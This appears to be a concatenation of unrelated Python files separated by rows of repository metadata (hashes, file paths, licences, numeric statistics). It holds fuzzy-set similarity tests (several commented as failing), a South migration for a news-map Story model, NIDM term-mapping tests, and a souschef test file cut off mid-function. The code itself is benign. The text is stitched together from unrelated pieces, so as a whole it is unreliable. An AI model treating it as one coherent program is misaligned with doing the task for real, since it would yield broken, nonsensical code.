        diagnosis = diagnoses[pair_index % len(diagnoses)]
        for (similarity, kwargs), expected in zip(variants, row):
            # NOTE: every TYPE_3_1 assertion was marked "fails" in the original test.
            assert_almost_equal(
                deng_jiang_fu(patient, diagnosis, similarity_type=similarity, **kwargs),
                expected, decimal=3)
def test_nguyen():
    """Check Nguyen's knowledge-based similarity measure on the paper's examples.

    Covers the extreme sets (full membership M, full non-membership N, fully
    hesitant F), pairwise examples, and the pattern-recognition examples 3/4.
    Fix: the original test assigned N twice with identical values; the
    duplicate statement has been removed (no behavioral change).
    """
    # Example 1 — extreme sets: M (pure membership), N (pure non-membership),
    # F (pure hesitancy).
    M = IntuitionisticFuzzySet([1.0], [0.0], [0.0])
    N = IntuitionisticFuzzySet([0.0], [1.0], [0.0])
    F = IntuitionisticFuzzySet([0.0], [0.0], [1.0])
    assert_equal(nguyen(M, N), -1)
    assert_equal(nguyen(M, F), 0.0)
    R = IntuitionisticFuzzySet([0.5], [0.3], [0.2])
    S = IntuitionisticFuzzySet([0.5], [0.2], [0.3])
    assert_almost_equal(nguyen(M, R), 0.7, decimal=1)
    assert_almost_equal(nguyen(M, S), 0.625, decimal=3)
    # Example 2 — assorted single-element pairs, including boundary cases
    # where the measure degenerates to -1 or 0.
    A = IntuitionisticFuzzySet([0.3], [0.3], [0.4])
    B = IntuitionisticFuzzySet([0.4], [0.4], [0.2])
    assert_almost_equal(nguyen(A, B), 0.827, decimal=3)
    A = IntuitionisticFuzzySet([0.3], [0.4], [0.3])
    B = IntuitionisticFuzzySet([0.4], [0.3], [0.3])
    assert_equal(nguyen(A, B), -1)
    A = IntuitionisticFuzzySet([1.0], [0.0], [0.0])
    B = IntuitionisticFuzzySet([0.0], [0.0], [1.0])
    assert_equal(nguyen(A, B), 0.0)
    A = IntuitionisticFuzzySet([0.5], [0.5], [0.0])
    B = IntuitionisticFuzzySet([0.0], [0.0], [1.0])
    assert_almost_equal(nguyen(A, B), 0.134, decimal=3)
    A = IntuitionisticFuzzySet([0.4], [0.2], [0.4])
    B = IntuitionisticFuzzySet([0.5], [0.3], [0.2])
    assert_almost_equal(nguyen(A, B), 0.829, decimal=3)
    A = IntuitionisticFuzzySet([0.4], [0.2], [0.4])
    B = IntuitionisticFuzzySet([0.5], [0.2], [0.3])
    assert_almost_equal(nguyen(A, B), 0.904, decimal=3)
    A = IntuitionisticFuzzySet([0.0], [0.87], [0.13])
    B = IntuitionisticFuzzySet([0.28], [0.55], [0.17])
    assert_almost_equal(nguyen(A, B), 0.861, decimal=3)
    # Degenerate input with a negative hesitancy margin, taken verbatim
    # from the paper's table.
    A = IntuitionisticFuzzySet([0.6], [0.87], [-0.4])
    B = IntuitionisticFuzzySet([0.28], [0.55], [0.17])
    assert_almost_equal(nguyen(A, B), 0.960, decimal=3)  # fails
    # Example 3 — pattern recognition: three candidates vs. reference B.
    A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2])
    A2 = IntuitionisticFuzzySet([0.35, 0.45, 0.55], [0.15, 0.25, 0.35], [0.5, 0.3, 0.1])
    A3 = IntuitionisticFuzzySet([0.25, 0.35, 0.45], [0.25, 0.35, 0.45], [0.5, 0.3, 0.1])
    B = IntuitionisticFuzzySet([0.3, 0.4, 0.5], [0.2, 0.3, 0.4], [0.5, 0.3, 0.1])
    assert_almost_equal(nguyen(A1, B), 0.757, decimal=3)
    assert_almost_equal(nguyen(A2, B), 0.994, decimal=3)
    assert_almost_equal(nguyen(A3, B), 0.998, decimal=3)
    # Example 4 — pattern recognition with negative similarities.
    A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2])
    A2 = IntuitionisticFuzzySet([0.3, 0.4, 0.2], [0.5, 0.4, 0.6], [0.2, 0.2, 0.2])
    A3 = IntuitionisticFuzzySet([0.4, 0.3, 0.2], [0.4, 0.5, 0.6], [0.2, 0.2, 0.2])
    B = IntuitionisticFuzzySet([0.3, 0.4, 0.5], [0.3, 0.4, 0.5], [0.4, 0.2, 0.0])
    assert_almost_equal(nguyen(A1, B), 0.841, decimal=3)
    assert_almost_equal(nguyen(A2, B), -0.988, decimal=3)
    assert_almost_equal(nguyen(A3, B), -0.988, decimal=3)
def test_chen_cheng_lan():
    """Check the chen_cheng_lan similarity measure against published values."""
    # Singleton sets: (mu_A, nu_A, mu_B, nu_B, expected similarity, decimals).
    singleton_cases = [
        ([0.3], [0.3], [0.4], [0.4], 0.9667, 4),
        ([0.3], [0.4], [0.4], [0.3], 0.9000, 4),
        ([1.0], [0.0], [0.0], [0.0], 0.5000, 4),
        ([0.5], [0.5], [0.0], [0.0], 0.8333, 4),
        ([0.4], [0.2], [0.5], [0.3], 0.9667, 4),
        ([0.4], [0.2], [0.5], [0.2], 0.9450, 4),
        # Table 2
        ([0.5], [0.5], [0.0], [0.0], 0.8333, 4),
        ([0.6], [0.4], [0.0], [0.0], 0.8330, 3),
        ([0.0], [0.87], [0.28], [0.55], 0.7047, 4),
        ([0.6], [0.27], [0.28], [0.55], 0.6953, 4),
    ]
    for mu_a, nu_a, mu_b, nu_b, expected, places in singleton_cases:
        first = IntuitionisticFuzzySet(mu_a, nu_a)
        second = IntuitionisticFuzzySet(mu_b, nu_b)
        assert_almost_equal(chen_cheng_lan(first, second), expected, decimal=places)
    # The examples below fails, most likely due to the rounding process of the authors
    # Example 7.1
    Q = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
    patterns = [
        (IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1]), 0.7100),
        (IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0]), 0.7133),
        (IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0]), 0.8117),
    ]
    for pattern, expected in patterns:
        assert_almost_equal(chen_cheng_lan(pattern, Q), expected, decimal=4)
    # Example 7.2
    Q = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.4, 0.2, 0.8])
    patterns = [
        (IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.1, 0.1, 0.9]), 0.8544),
        (IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.3, 0.8]), 0.9356),
        (IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.2, 0.8, 0.4]), 0.5333),
    ]
    for pattern, expected in patterns:
        assert_almost_equal(chen_cheng_lan(pattern, Q), expected, decimal=4)
    # Example 7.3
    Q = IntuitionisticFuzzySet([0.4, 0.7, 0.3, 0.7], [0.3, 0.1, 0.6, 0.3])
    patterns = [
        (IntuitionisticFuzzySet([0.5, 0.7, 0.4, 0.7], [0.3, 0.0, 0.5, 0.3]), 0.9413),
        (IntuitionisticFuzzySet([0.5, 0.6, 0.2, 0.7], [0.2, 0.1, 0.7, 0.3]), 0.9150),
        (IntuitionisticFuzzySet([0.5, 0.7, 0.4, 0.7], [0.4, 0.1, 0.6, 0.2]), 0.9504),
    ]
    for pattern, expected in patterns:
        assert_almost_equal(chen_cheng_lan(pattern, Q), expected, decimal=4)
def test_muthukumar_krishnanb():
    """Check the muthukumar_krishnanb similarity measure against published values."""
    # all tests fail
    F = IntuitionisticFuzzySet([0.3, 0.5, 0.6, 0.5, 0.7, 0.9, 0.7, 0.8, 0.6, 0.7, 0.7, 0.3],
                               [0.0, 0.1, 0.3, 0.0, 0.1, 0.0, 0.1, 0.2, 0.2, 0.0, 0.2, 0.0])
    G = IntuitionisticFuzzySet([0.8, 0.7, 0.5, 0.4, 0.9, 0.9, 0.8, 0.7, 0.5, 0.9, 0.6, 0.8],
                               [0.1, 0.2, 0.2, 0.1, 0.0, 0.0, 0.0, 0.0, 0.3, 0.1, 0.1, 0.1])
    assert_almost_equal(muthukumar_krishnanb(F, G), 0.81448, decimal=5)
    F = IntuitionisticFuzzySet([0.6, 0.4, 0.8, 0.5, 0.7, 0.6, 0.8, 0.6, 0.9],
                               [0.2, 0.5, 0.1, 0.3, 0.1, 0.3, 0.2, 0.0, 0.0])
    G = IntuitionisticFuzzySet([0.5, 0.7, 0.6, 0.6, 0.4, 0.5, 0.9, 0.5, 0.8],
                               [0.3, 0.0, 0.3, 0.2, 0.0, 0.1, 0.0, 0.1, 0.0])
    H = IntuitionisticFuzzySet([0.4, 0.6, 0.5, 0.3, 0.7, 0.5, 0.2, 0.5, 0.1],
                               [0.4, 0.2, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8])
    for left, right, expected in ((F, G, 0.8029), (G, H, 0.4907), (F, H, 0.4843)):
        assert_almost_equal(muthukumar_krishnanb(left, right), expected, decimal=4)
    # Pattern-recognition table: 15 candidate patterns matched against M.
    M = IntuitionisticFuzzySet([0.6, 0.4, 0.8, 0.5, 0.7, 0.6, 0.8, 0.6, 0.9],
                               [0.2, 0.5, 0.1, 0.3, 0.1, 0.3, 0.2, 0.0, 0.0])
    # Each row: (membership values, non-membership values, expected similarity).
    pattern_rows = [
        ([0.5, 0.7, 0.6, 0.6, 0.4, 0.5, 0.9, 0.5, 0.8], [0.3, 0.0, 0.3, 0.2, 0.0, 0.1, 0.0, 0.1, 0.0], 0.8092),
        ([0.2, 0.6, 0.5, 0.3, 0.7, 0.4, 0.2, 0.5, 0.1], [0.4, 0.2, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8], 0.4733),
        ([0.5, 0.5, 0.3, 0.1, 0.3, 0.6, 0.3, 0.0, 0.2], [0.4, 0.0, 0.6, 0.8, 0.0, 0.2, 0.5, 0.2, 0.4], 0.3906),
        ([0.3, 0.6, 0.2, 0.4, 0.2, 0.5, 0.3, 0.4, 0.2], [0.5, 0.0, 0.6, 0.5, 0.4, 0.0, 0.1, 0.0, 0.6], 0.4047),
        ([0.5, 0.4, 0.6, 0.0, 0.3, 0.4, 0.1, 0.2, 0.4], [0.0, 0.0, 0.2, 0.2, 0.0, 0.0, 0.5, 0.0, 0.4], 0.4232),
        ([0.4, 0.6, 0.5, 0.3, 0.7, 0.5, 0.2, 0.5, 0.1], [0.4, 0.2, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8], 0.5064),
        ([0.3, 0.7, 0.6, 0.5, 0.9, 0.7, 0.6, 0.7, 0.7], [0.0, 0.1, 0.2, 0.1, 0.0, 0.0, 0.3, 0.1, 0.2], 0.7305),
        ([0.8, 0.9, 0.5, 0.7, 0.9, 0.9, 0.5, 0.8, 0.6], [0.1, 0.0, 0.3, 0.2, 0.0, 0.1, 0.2, 0.0, 0.1], 0.7279),
        ([0.5, 0.8, 0.3, 0.4, 0.7, 0.8, 0.0, 0.4, 0.0], [0.0, 0.2, 0.0, 0.1, 0.0, 0.1, 0.8, 0.3, 0.7], 0.4497),
        ([0.7, 0.4, 0.6, 0.5, 0.7, 0.6, 0.8, 0.6, 0.9], [0.2, 0.5, 0.1, 0.3, 0.1, 0.0, 0.2, 0.0, 0.0], 0.9323),
        ([0.4, 0.7, 0.6, 0.6, 0.4, 0.5, 0.7, 0.5, 0.8], [0.3, 0.0, 0.3, 0.2, 0.0, 0.1, 0.2, 0.1, 0.0], 0.8000),
        ([0.6, 0.5, 0.5, 0.3, 0.5, 0.4, 0.2, 0.5, 0.1], [0.4, 0.0, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8], 0.4738),
        ([0.5, 0.6, 0.4, 0.5, 0.3, 0.2, 0.5, 0.4, 0.2], [0.3, 0.0, 0.3, 0.4, 0.2, 0.1, 0.0, 0.0, 0.5], 0.5112),
        ([0.0, 0.4, 0.5, 0.4, 0.3, 0.4, 0.3, 0.4, 0.3], [0.5, 0.3, 0.2, 0.1, 0.2, 0.1, 0.1, 0.3, 0.5], 0.4755),
        ([0.4, 0.2, 0.0, 0.0, 0.5, 0.4, 0.5, 0.2, 0.4], [0.0, 0.3, 0.2, 0.3, 0.2, 0.3, 0.3, 0.3, 0.4], 0.4625),
    ]
    for mu, nu, expected in pattern_rows:
        candidate = IntuitionisticFuzzySet(mu, nu)
        assert_almost_equal(muthukumar_krishnanb(candidate, M), expected, decimal=4)
| 62.406481
| 154
| 0.683734
| 11,984
| 67,399
| 3.525701
| 0.039803
| 0.100753
| 0.123142
| 0.132917
| 0.919601
| 0.896265
| 0.879248
| 0.832884
| 0.811394
| 0.789028
| 0
| 0.114098
| 0.173741
| 67,399
| 1,079
| 155
| 62.464319
| 0.644616
| 0.0123
| 0
| 0.314836
| 0
| 0
| 0.000722
| 0
| 0
| 0
| 0
| 0
| 0.510759
| 1
| 0.024915
| false
| 0.001133
| 0.014723
| 0
| 0.039638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3f595fe53969c414c5560deb820dd0c8dad71fe
| 3,594
|
py
|
Python
|
geonewsloco/maploco/migrations/0003_auto__chg_field_story_headline__chg_field_story_popularity__chg_field_.py
|
robertjli/geo-news-map-loco
|
ae56e9293149a42cd560ad4646eeadfbc2865963
|
[
"MIT"
] | null | null | null |
geonewsloco/maploco/migrations/0003_auto__chg_field_story_headline__chg_field_story_popularity__chg_field_.py
|
robertjli/geo-news-map-loco
|
ae56e9293149a42cd560ad4646eeadfbc2865963
|
[
"MIT"
] | null | null | null |
geonewsloco/maploco/migrations/0003_auto__chg_field_story_headline__chg_field_story_popularity__chg_field_.py
|
robertjli/geo-news-map-loco
|
ae56e9293149a42cd560ad4646eeadfbc2865963
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration for the maploco app.

    forwards() relaxes every user-entered Story column to allow NULL;
    backwards() restores NOT NULL, supplying throwaway defaults so the
    reverse ALTER can succeed on rows that already contain NULLs.
    (Auto-generated by South; edit with care.)
    """

    def forwards(self, orm):
        # Each alter_column drops the NOT NULL constraint on one column.
        # Changing field 'Story.headline'
        db.alter_column(u'maploco_story', 'headline', self.gf('django.db.models.fields.CharField')(max_length=100, null=True))
        # Changing field 'Story.popularity'
        db.alter_column(u'maploco_story', 'popularity', self.gf('django.db.models.fields.IntegerField')(null=True))
        # Changing field 'Story.lon'
        db.alter_column(u'maploco_story', 'lon', self.gf('django.db.models.fields.FloatField')(null=True))
        # Changing field 'Story.url'
        db.alter_column(u'maploco_story', 'url', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
        # Changing field 'Story.location_description'
        db.alter_column(u'maploco_story', 'location_description', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
        # Changing field 'Story.lat'
        db.alter_column(u'maploco_story', 'lat', self.gf('django.db.models.fields.FloatField')(null=True))
        # Changing field 'Story.blurb'
        db.alter_column(u'maploco_story', 'blurb', self.gf('django.db.models.fields.CharField')(max_length=1000, null=True))

    def backwards(self, orm):
        # The 'dummy'/-1 defaults only exist to back-fill NULL rows while
        # re-adding NOT NULL; they are not meaningful application values.
        # Changing field 'Story.headline'
        db.alter_column(u'maploco_story', 'headline', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=100))
        # Changing field 'Story.popularity'
        db.alter_column(u'maploco_story', 'popularity', self.gf('django.db.models.fields.IntegerField')(default=-1))
        # Changing field 'Story.lon'
        db.alter_column(u'maploco_story', 'lon', self.gf('django.db.models.fields.FloatField')(default=-1))
        # Changing field 'Story.url'
        db.alter_column(u'maploco_story', 'url', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=255))
        # Changing field 'Story.location_description'
        db.alter_column(u'maploco_story', 'location_description', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=255))
        # Changing field 'Story.lat'
        db.alter_column(u'maploco_story', 'lat', self.gf('django.db.models.fields.FloatField')(default=-1))
        # Changing field 'Story.blurb'
        db.alter_column(u'maploco_story', 'blurb', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=1000))

    # Frozen ORM snapshot used by South to reconstruct the model state.
    models = {
        u'maploco.story': {
            'Meta': {'object_name': 'Story'},
            'blurb': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
            'headline': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
            'location_description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
            'popularity': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
        }
    }

    complete_apps = ['maploco']
| 50.619718
| 144
| 0.645242
| 449
| 3,594
| 5.055679
| 0.135857
| 0.081057
| 0.135683
| 0.193833
| 0.837885
| 0.834361
| 0.834361
| 0.813216
| 0.813216
| 0.771806
| 0
| 0.014696
| 0.166945
| 3,594
| 70
| 145
| 51.342857
| 0.743487
| 0.128269
| 0
| 0
| 0
| 0
| 0.426051
| 0.237729
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.114286
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3103dafe0a13ba4e5b9201613b19b89430d7fa1e
| 10,687
|
py
|
Python
|
nidm/experiment/tests/test_map_vars_to_terms.py
|
surchs/PyNIDM
|
bd3497a03060a74870aee3964bdacf39500aa941
|
[
"Apache-2.0"
] | 20
|
2017-11-25T19:34:02.000Z
|
2021-11-27T01:43:37.000Z
|
nidm/experiment/tests/test_map_vars_to_terms.py
|
surchs/PyNIDM
|
bd3497a03060a74870aee3964bdacf39500aa941
|
[
"Apache-2.0"
] | 100
|
2017-05-10T22:07:32.000Z
|
2021-12-09T20:14:13.000Z
|
nidm/experiment/tests/test_map_vars_to_terms.py
|
surchs/PyNIDM
|
bd3497a03060a74870aee3964bdacf39500aa941
|
[
"Apache-2.0"
] | 27
|
2017-05-10T21:54:59.000Z
|
2021-11-12T18:26:03.000Z
|
from pathlib import Path
import pytest
import pandas as pd
import json
import os
import urllib
import re
from nidm.experiment.Utils import map_variables_to_terms
import tempfile
from os.path import join
from nidm.core import Constants
from uuid import UUID
@pytest.fixture(scope="module", autouse=True)
def setup():
    """Build the shared fixtures once for the whole test module.

    Populates three module-level globals used by the tests below:
      DATA                 -- small participants DataFrame (id, age, sex)
      REPROSCHEMA_JSON_MAP -- ReproSchema-style annotations keyed by DD(...)
      BIDS_SIDECAR         -- the same annotations in BIDS sidecar layout

    Fix: ``autouse`` is documented as a bool; it was previously the string
    "True", which only worked because pytest merely checks truthiness.
    """
    global DATA, REPROSCHEMA_JSON_MAP, BIDS_SIDECAR

    temp = {'participant_id': ['100', '101', '102', '103', '104', '105', '106', '107', '108', '109'],
            'age': [18, 25, 30, 19, 35, 20, 27, 29, 38, 27],
            'sex': ['m', 'm', 'f', 'm', 'f', 'f', 'f', 'f', 'm', 'm']}
    DATA = pd.DataFrame(temp)

    REPROSCHEMA_JSON_MAP = json.loads(
        '''
        {
            "DD(source='participants.tsv', variable='participant_id')": {
                "label": "participant_id",
                "description": "subject/participant identifier",
                "source_variable": "participant_id",
                "responseOptions": {
                    "valueType": "http://www.w3.org/2001/XMLSchema#string"
                },
                "isAbout": [
                    {
                        "@id": "https://ndar.nih.gov/api/datadictionary/v2/dataelement/src_subject_id",
                        "label": "src_subject_id"
                    }
                ]
            },
            "DD(source='participants.tsv', variable='age')": {
                "responseOptions": {
                    "unitCode": "years",
                    "minValue": "0",
                    "maxValue": "100",
                    "valueType": "http://www.w3.org/2001/XMLSchema#integer"
                },
                "label": "age",
                "description": "age of participant",
                "source_variable": "age",
                "associatedWith": "NIDM",
                "isAbout": [
                    {
                        "@id": "http://uri.interlex.org/ilx_0100400",
                        "label": "Age"
                    }
                ]
            },
            "DD(source='participants.tsv', variable='sex')": {
                "responseOptions": {
                    "minValue": "NA",
                    "maxValue": "NA",
                    "unitCode": "NA",
                    "valueType": "http://www.w3.org/2001/XMLSchema#complexType",
                    "choices": {
                        "Male": "m",
                        "Female": "f"
                    }
                },
                "label": "sex",
                "description": "biological sex of participant",
                "source_variable": "sex",
                "associatedWith": "NIDM",
                "isAbout": [
                    {
                        "@id": "http://uri.interlex.org/ilx_0738439",
                        "label": "SEX"
                    }
                ]
            }
        }''')

    BIDS_SIDECAR = json.loads(
        '''
        {
            "age": {
                "label": "age",
                "description": "age of participant",
                "source_variable": "age",
                "associatedWith": "NIDM",
                "isAbout": [
                    {
                        "@id": "http://uri.interlex.org/ilx_0100400",
                        "label": "Age"
                    }
                ],
                "valueType": "http://www.w3.org/2001/XMLSchema#integer",
                "minValue": "10",
                "maxValue": "100"
            },
            "sex": {
                "minValue": "NA",
                "maxValue": "NA",
                "unitCode": "NA",
                "valueType": "http://www.w3.org/2001/XMLSchema#complexType",
                "levels": {
                    "Male": "m",
                    "Female": "f"
                },
                "label": "sex",
                "description": "biological sex of participant",
                "source_variable": "sex",
                "associatedWith": "NIDM",
                "isAbout": [
                    {
                        "@id": "http://uri.interlex.org/ilx_0738439",
                        "label": "SEX"
                    }
                ]
            }
        }
        ''')
def test_map_vars_to_terms_BIDS():
    '''
    This function will test the Utils.py "map_vars_to_terms" function with a BIDS-formatted
    JSON sidecar file
    '''
    global DATA, BIDS_SIDECAR

    column_to_terms, cde = map_variables_to_terms(df=DATA, json_source=BIDS_SIDECAR,
                                                  directory=tempfile.gettempdir(), assessment_name="test", bids=True)

    # check whether JSON mapping structure returned from map_variables_to_terms matches the
    # reproshema structure
    assert "DD(source='test', variable='age')" in column_to_terms.keys()
    assert "DD(source='test', variable='sex')" in column_to_terms.keys()
    assert "isAbout" in column_to_terms["DD(source='test', variable='age')"].keys()
    assert "http://uri.interlex.org/ilx_0100400" == column_to_terms["DD(source='test', variable='age')"] \
        ['isAbout'][0]['@id']
    assert "http://uri.interlex.org/ilx_0738439" == column_to_terms["DD(source='test', variable='sex')"] \
        ['isAbout'][0]['@id']
    assert "responseOptions" in column_to_terms["DD(source='test', variable='sex')"].keys()
    assert "choices" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions'].keys()
    # (fix: the two assertions below were duplicated verbatim in the original)
    assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
    assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']

    # now check the JSON sidecar file created by map_variables_to_terms which should match BIDS format
    with open(join(tempfile.gettempdir(), "nidm_annotations.json")) as fp:
        bids_sidecar = json.load(fp)

    assert "age" in bids_sidecar.keys()
    assert "sex" in bids_sidecar.keys()
    assert "isAbout" in bids_sidecar["age"].keys()
    assert "http://uri.interlex.org/ilx_0100400" == bids_sidecar["age"] \
        ['isAbout'][0]['@id']
    assert "http://uri.interlex.org/ilx_0738439" == bids_sidecar["sex"] \
        ['isAbout'][0]['@id']
    # BIDS uses "levels" (not "choices") for categorical values
    assert "levels" in bids_sidecar["sex"].keys()
    # (fix: the two assertions below were duplicated verbatim in the original)
    assert "Male" in bids_sidecar["sex"]['levels'].keys()
    assert "m" == bids_sidecar["sex"]['levels']['Male']

    # check the CDE dataelement graph for correct information
    query = '''
        prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#>
        select distinct ?uuid ?DataElements ?property ?value
            where {
                ?uuid a/rdfs:subClassOf* nidm:DataElement ;
                    ?property ?value .
    }'''
    qres = cde.query(query)
    # Every data element triple found in the CDE graph.
    results = [list(row) for row in qres]
    assert len(results) == 20
def test_map_vars_to_terms_reproschema():
    '''
    This function will test the Utils.py "map_vars_to_terms" function with a reproschema-formatted
    JSON sidecar file
    '''
    global DATA, REPROSCHEMA_JSON_MAP

    column_to_terms, cde = map_variables_to_terms(df=DATA, json_source=REPROSCHEMA_JSON_MAP,
                                                  directory=tempfile.gettempdir(), assessment_name="test")

    # check whether JSON mapping structure returned from map_variables_to_terms matches the
    # reproshema structure
    assert "DD(source='test', variable='age')" in column_to_terms.keys()
    assert "DD(source='test', variable='sex')" in column_to_terms.keys()
    assert "isAbout" in column_to_terms["DD(source='test', variable='age')"].keys()
    assert "http://uri.interlex.org/ilx_0100400" == column_to_terms["DD(source='test', variable='age')"] \
        ['isAbout'][0]['@id']
    assert "http://uri.interlex.org/ilx_0738439" == column_to_terms["DD(source='test', variable='sex')"] \
        ['isAbout'][0]['@id']
    assert "responseOptions" in column_to_terms["DD(source='test', variable='sex')"].keys()
    assert "choices" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions'].keys()
    # (fix: the two assertions below were duplicated verbatim in the original)
    assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
    assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']

    # now check the JSON mapping file created by map_variables_to_terms which should match Reproschema format
    with open(join(tempfile.gettempdir(), "nidm_annotations.json")) as fp:
        reproschema_json = json.load(fp)

    # BUG FIX: the original re-asserted against column_to_terms here, so the
    # freshly loaded reproschema_json file was never actually verified.
    assert "DD(source='test', variable='age')" in reproschema_json.keys()
    assert "DD(source='test', variable='sex')" in reproschema_json.keys()
    assert "isAbout" in reproschema_json["DD(source='test', variable='age')"].keys()
    assert "http://uri.interlex.org/ilx_0100400" == reproschema_json["DD(source='test', variable='age')"] \
        ['isAbout'][0]['@id']
    assert "http://uri.interlex.org/ilx_0738439" == reproschema_json["DD(source='test', variable='sex')"] \
        ['isAbout'][0]['@id']
    assert "responseOptions" in reproschema_json["DD(source='test', variable='sex')"].keys()
    assert "choices" in reproschema_json["DD(source='test', variable='sex')"]['responseOptions'].keys()
    assert "Male" in reproschema_json["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
    assert "m" == reproschema_json["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']

    # check the CDE dataelement graph for correct information
    query = '''
        prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#>
        select distinct ?uuid ?DataElements ?property ?value
            where {
                ?uuid a/rdfs:subClassOf* nidm:DataElement ;
                    ?property ?value .
    }'''
    qres = cde.query(query)
    # Every data element triple found in the CDE graph.
    results = [list(row) for row in qres]
    assert len(results) == 20
| 40.634981
| 110
| 0.549265
| 1,145
| 10,687
| 4.985153
| 0.153712
| 0.056412
| 0.079713
| 0.115627
| 0.831815
| 0.796076
| 0.761037
| 0.755081
| 0.740715
| 0.733532
| 0
| 0.025544
| 0.285674
| 10,687
| 262
| 111
| 40.790076
| 0.722164
| 0.069804
| 0
| 0.645455
| 0
| 0
| 0.408864
| 0.006554
| 0
| 0
| 0
| 0
| 0.409091
| 1
| 0.027273
| false
| 0
| 0.109091
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31091d09e6962bc0d86f8c7052feab814c54a4f9
| 1,676
|
py
|
Python
|
tests/test_jinja_expression.py
|
sgbaird/souschef
|
a1cf400d104aab85c963f473cca02af9706fd7b0
|
[
"Apache-2.0"
] | 4
|
2022-01-05T17:59:15.000Z
|
2022-01-24T14:55:47.000Z
|
tests/test_jinja_expression.py
|
sgbaird/souschef
|
a1cf400d104aab85c963f473cca02af9706fd7b0
|
[
"Apache-2.0"
] | 29
|
2020-11-15T00:39:02.000Z
|
2022-01-16T14:33:37.000Z
|
tests/test_jinja_expression.py
|
sgbaird/souschef
|
a1cf400d104aab85c963f473cca02af9706fd7b0
|
[
"Apache-2.0"
] | 1
|
2022-01-14T03:22:16.000Z
|
2022-01-14T03:22:16.000Z
|
from souschef.jinja_expression import (
get_global_jinja_var,
is_jinja_expression,
set_global_jinja_var,
)
def test_add_jinja_var(pure_yaml_with_comments):
    """A newly set global jinja variable can be read back unchanged."""
    recipe = pure_yaml_with_comments
    set_global_jinja_var(recipe, "version", "10.9.8")
    assert get_global_jinja_var(recipe, "version") == "10.9.8"
def test_is_jinja_expression(simple_full_recipe):
    """The recipe's first line is a jinja expression; the last one is not."""
    assert is_jinja_expression(simple_full_recipe[0]) is True or is_jinja_expression(simple_full_recipe[0])
    last_line = simple_full_recipe[-1]
    assert not is_jinja_expression(last_line)
def test_get_global_jinja_var(simple_full_recipe):
    """Global jinja variables are looked up by name in the recipe."""
    expected = {"name": "mat_discover", "version": "1.2.1"}
    for var_name, var_value in expected.items():
        assert get_global_jinja_var(simple_full_recipe, var_name) == var_value
def test_get_global_jinja_var_multiple_one_line(multiple_jinja_var_same_line):
    """Variables sharing a single line are still looked up individually."""
    expected = {"name": "mat_discover", "version": "1.2.1"}
    for var_name, var_value in expected.items():
        assert get_global_jinja_var(multiple_jinja_var_same_line, var_name) == var_value
def test_set_global_jinja_var(simple_full_recipe):
    """Overwriting an existing global jinja variable is reflected on read."""
